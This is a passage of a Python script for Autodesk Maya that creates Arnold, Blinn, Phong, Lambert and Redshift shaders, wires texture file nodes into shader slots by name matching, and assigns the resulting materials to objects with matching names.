connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
global selected_shader
selected_shader = cmds.shadingNode(default_shader, asShader = True)
global shadingEngine
shadingEngine = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader + '.outColor', shadingEngine + '.surfaceShader')
global selected_shader2
selected_shader2 = selected_shader
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
blinn_shaders = cmds.ls(type = 'blinn')
phong_shaders = cmds.ls(type = 'phong')
lambert_shaders = cmds.ls(type = 'lambert')
redshift_shaders = cmds.ls(type = 'RedshiftMaterial')
#Arnold
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_2
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_5
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
global connect_6
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
global connect_7
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(type = 'file')
if default_shader == arnold:
global i
for i in names:
if color_text in i or color_text.lower() in i:
if color_text in i:
cut = i.partition( '_Base' + color_text)
elif color_text.lower() in i:
cut = i.partition( '_base' + color_text.lower())
same_name = False
arnold_shaders = cmds.ls(type = 'aiStandardSurface')
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i or color_alt_text.lower() in i:
if color_alt_text in i:
cut = i.partition( '_' + color_alt_text)
elif color_alt_text.lower() in i:
cut = i.partition( '_' + color_alt_text.lower())
same_name = False
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt2_text in i or color_alt2_text.lower() in i:
if color_alt2_text in i:
cut = i.partition( '_' + color_alt2_text)
elif color_alt2_text.lower() in i:
cut = i.partition( '_' + color_alt2_text.lower())
same_name = False
global b
for b in arnold_shaders:
if cut[0] in b:
global selected_shader2
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.baseColor'.format(b)):
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
global obj_shad_name
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i or roughness_text.lower() in i:
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
elif roughness_text.lower() in i:
cut = i.partition( '_' + roughness_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.specularRoughness'.format(b)):
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i or roughness_alt_text.lower() in i:
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
elif roughness_alt_text.lower() in i:
cut = i.partition( '_' + roughness_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.specularRoughness'.format(b)):
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i or metal_text.lower() in i:
if metal_text in i:
cut = i.partition( '_' + metal_text)
elif metal_text.lower() in i:
cut = i.partition( '_' + metal_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.metalness'.format(b)):
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i or metal_alt_text.lower() in i:
if metal_alt_text in i:
cut = i.partition( '_' + metal_alt_text)
elif metal_alt_text.lower() in i:
cut = i.partition( '_' + metal_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.metalness'.format(b)):
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i or normal_text.lower() in i:
if normal_text in i:
cut = i.partition( '_' + normal_text)
elif normal_text.lower() in i:
cut = i.partition( '_' + normal_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
if not cmds.listConnections('{0}.normalCamera'.format(b)):
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i or scatter_text.lower() in i:
if scatter_text in i:
cut = i.partition( '_' + scatter_text)
elif scatter_text.lower() in i:
cut = i.partition( '_' + scatter_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
if not cmds.listConnections('{0}.subsurface'.format(b)):
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i or emissive_text.lower() in i:
if emissive_text in i:
cut = i.partition( '_' + emissive_text)
elif emissive_text.lower() in i:
cut = i.partition( '_' + emissive_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
if not cmds.listConnections('{0}.emissionColor'.format(b)):
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i or ior_text.lower() in i:
if ior_text in i:
cut = i.partition( '_' + ior_text)
elif ior_text.lower() in i:
cut = i.partition( '_' + ior_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
if not cmds.listConnections('{0}.specularIOR'.format(b)):
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i or opacity_text.lower() in i:
if opacity_text in i:
cut = i.partition( '_' + opacity_text)
elif opacity_text.lower() in i:
cut = i.partition( '_' + opacity_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity'.format(b)):
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if opacity_alt_text in i or opacity_alt_text.lower() in i:
if opacity_alt_text in i:
cut = i.partition( '_' + opacity_alt_text)
elif opacity_alt_text.lower() in i:
cut = i.partition( '_' + opacity_alt_text.lower())
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity'.format(b)):
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls( type = 'file')
if default_shader == blinn:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(type = 'file')
if default_shader == phong:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color', '.transl_color']
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_2
connected_2 = cmds.listConnections(selected_shader + my_array[1])
global connected_3
connected_3 = cmds.listConnections(selected_shader + my_array[2])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_5
connected_5 = cmds.listConnections(selected_shader + my_array[4])
global connected_6
connected_6 = cmds.listConnections(selected_shader + my_array[5])
global connected_7
connected_7 = cmds.listConnections(selected_shader + my_array[6])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_2
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
global connect_3
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_5
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
global connect_6
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
global connect_7
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
global connect_9
connect_9 = cmds.listConnections(selected_shader2 + my_array[8])
names = cmds.ls( type = 'file')
if default_shader == redshift:
global i
for i in names:
if color_text in i or color_text.lower() in i: #Roughness
if color_text in i:
cut = i.partition( '_Base' + color_text)
elif color_text.lower() in i:
cut = i.partition( '_base' + color_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
global same_name
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i or color_alt_text.lower() in i: #Roughness
if color_alt_text in i:
cut = i.partition( '_' + color_alt_text)
elif color_alt_text.lower() in i:
cut = i.partition( '_' + color_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt2_text in i or color_alt2_text.lower() in i: #Roughness
if color_alt2_text in i:
cut = i.partition( '_' + color_alt2_text)
elif color_alt2_text.lower() in i:
cut = i.partition( '_' + color_alt2_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
if not cmds.listConnections('{0}.diffuse_color'.format(b)):
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i or roughness_text.lower() in i: #Roughness
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
elif roughness_text.lower() in i:
cut = i.partition( '_' + roughness_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.refl_roughness'.format(b)):
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if roughness_alt_text in i or roughness_alt_text.lower() in i:
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
elif roughness_alt_text.lower() in i:
cut = i.partition( '_' + roughness_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
if not cmds.listConnections('{0}.refl_roughness'.format(b)):
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if metal_text in i or metal_text.lower() in i:
if metal_text in i:
cut = i.partition( '_' + metal_text)
elif metal_text.lower() in i:
cut = i.partition( '_' + metal_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.refl_metalness'.format(b)):
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i or metal_alt_text.lower() in i:
if metal_alt_text in i:
cut = i.partition( '_' + metal_alt_text)
elif metal_alt_text.lower() in i:
cut = i.partition( '_' + metal_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
if not cmds.listConnections('{0}.refl_metalness'.format(b)):
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i or normal_text.lower() in i:
if normal_text in i:
cut = i.partition( '_' + normal_text)
elif normal_text.lower() in i:
cut = i.partition( '_' + normal_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
if not cmds.listConnections('{0}.bump_input'.format(b)):
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i or scatter_text.lower() in i:
if scatter_text in i:
cut = i.partition( '_' + scatter_text)
elif scatter_text.lower() in i:
cut = i.partition( '_' + scatter_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
if not cmds.listConnections('{0}.ms_amount'.format(b)):
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i or emissive_text.lower() in i:
if emissive_text in i:
cut = i.partition( '_' + emissive_text)
elif emissive_text.lower() in i:
cut = i.partition( '_' + emissive_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
if not cmds.listConnections('{0}.emission_color'.format(b)):
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i or ior_text.lower() in i:
if ior_text in i:
cut = i.partition( '_' + ior_text)
elif ior_text.lower() in i:
cut = i.partition( '_' + ior_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
if not cmds.listConnections('{0}.refl_ior'.format(b)):
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i or opacity_text.lower() in i:
if opacity_text in i:
cut = i.partition( '_' + opacity_text)
elif opacity_text.lower() in i:
cut = i.partition( '_' + opacity_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity_color'.format(b)):
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if opacity_alt_text in i or opacity_alt_text.lower() in i:
if opacity_alt_text in i:
cut = i.partition( '_' + opacity_alt_text)
elif opacity_alt_text.lower() in i:
cut = i.partition( '_' + opacity_alt_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.opacity_color'.format(b)):
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if translucency_text in i or translucency_text.lower() in i:
if translucency_text in i:
cut = i.partition( '_' + translucency_text)
elif translucency_text.lower() in i:
cut = i.partition( '_' + translucency_text.lower())
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
if not cmds.listConnections('{0}.transl_color'.format(b)):
translucency_func2('.transl_color')
if same_name == False:
translucency_func2('.transl_color')
#lambert
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
global connected_1
connected_1 = cmds.listConnections(selected_shader + my_array[0])
global connected_4
connected_4 = cmds.listConnections(selected_shader + my_array[3])
global connected_8
connected_8 = cmds.listConnections(selected_shader + my_array[7])
global connect_1
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
global connect_4
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
global connect_8
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls( type = 'file')
if default_shader == lambert:
global i
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
global selected_shader2
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
# Deletes any materials without incoming color connection
counter = 0
global counter
while counter < number_of_shaders:
delete_shader(shaders_list[counter], shaders_color_list[counter])
counter = counter + 1
# assigns objects with the same name as the materials created.
arnold_final_shaders = cmds.ls(type = arnold)
blinn_final_shaders = cmds.ls(type = blinn)
phong_final_shaders = cmds.ls(type = phong)
redshift_final_shaders = cmds.ls(type = redshift)
lambert_final_shaders = cmds.ls(type = lambert)
object_suf_len = len(object_suffix)
object_names = cmds.ls(type = 'transform')
shader_arnold_len = len(arnold_final_shaders)
shader_blinn_len = len(blinn_final_shaders)
shader_phong_len = len(phong_final_shaders)
shader_redshift_len = len(redshift_final_shaders)
shader_lambert_len = len(lambert_final_shaders)
var = 0
if object_material_connect == True:
if default_shader == arnold:
while var < shader_arnold_len:
for b in object_names:
c = arnold_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((arnold_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == blinn:
while var < shader_blinn_len:
for b in object_names:
c = blinn_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((blinn_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == phong:
while var < shader_phong_len:
for b in object_names:
c = phong_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((phong_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == redshift:
while var < shader_redshift_len:
for b in object_names:
c = redshift_final_shaders[var]
d = c.partition(material_suffix)[0]
x = b.lower()
y = d.lower()
if y in x:
test = cmds.listConnections((redshift_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == lambert:
while var < shader_lambert_len:
for b in object_names:
c = lambert_final_shaders[var]
d = c.partition(material_suffix)[0]
if d in b:
test = cmds.listConnections((lambert_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
def Selected() -> None:
    """Wire the currently selected texture files into the currently selected shader.

    Reads Maya's active selection twice: the first selected shader node of a
    supported type (aiStandardSurface, blinn, phong, RedshiftMaterial or
    lambert) becomes the connection target, and every selected ``file``
    texture node is routed to a shader slot chosen by substring-matching the
    texture's node name against the module-level ``*_text`` keyword globals.

    Side effects: rebinds the module globals ``selected_shader``, ``i`` and
    the relevant ``connected_1`` .. ``connected_8`` existing-connection lists,
    which the ``*_func`` helpers (defined elsewhere in this file) presumably
    consume — confirm against their definitions.
    """
